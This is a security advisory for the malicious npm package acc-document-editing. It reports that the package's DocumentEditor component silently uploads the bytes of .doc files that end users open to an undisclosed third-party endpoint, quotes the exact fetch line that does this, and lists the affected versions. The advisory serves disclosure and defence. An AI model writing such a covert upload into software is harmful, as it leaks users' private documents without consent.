VYPR

npm · Malicious package advisory

Malware

acc-document-editing

MAL-2026-4474

Malicious code in acc-document-editing (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (7c82ee7b879d66ba2fb79ec7ad7fee47623c2c3b68c8a925510b1f42cd1e3456)
The DocumentEditor React component exported by this package, when an end-user opens a.doc file, POSTs the raw file bytes to https://converter-apis.vercel.app/api/convert — a generic Vercel-hosted endpoint that is not OnlyOffice and is not disclosed in the package's README or API documentation. The README advertises a self-hosted OnlyOffice/X2T integration (X2T conversion runs locally in WASM), so integrators reasonably expect document content to stay on their own infrastructure. The.doc handling path in dist/index.cjs:565 (`fetch("https://converter-apis.vercel.app/api/convert", { method: "POST", body: new Blob([arrayBuffer], { type: "application/msword" }) })`) silently relays end-user document bytes to the package author's chosen third-party endpoint with no consent UI, no documentation, and no configuration option to disable or redirect the upload. The destination is a generic free-tier Vercel hostname rather than an OnlyOffice domain, breaking the trust expectation of the advertised self-hosted editor. The postinstall script that copies static assets into the host project's public/ directory, and the child_process/fetch references inside the bundled X2T WASM toolchain, are documented and purpose-matched (X2T is the OnlyOffice document conversion tool); those are not the basis for the verdict.

Compromised versions (6)

  • 0.1.6
  • 0.1.1
  • 0.1.3
  • 0.1.8
  • 0.1.5
  • 0.1.4

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.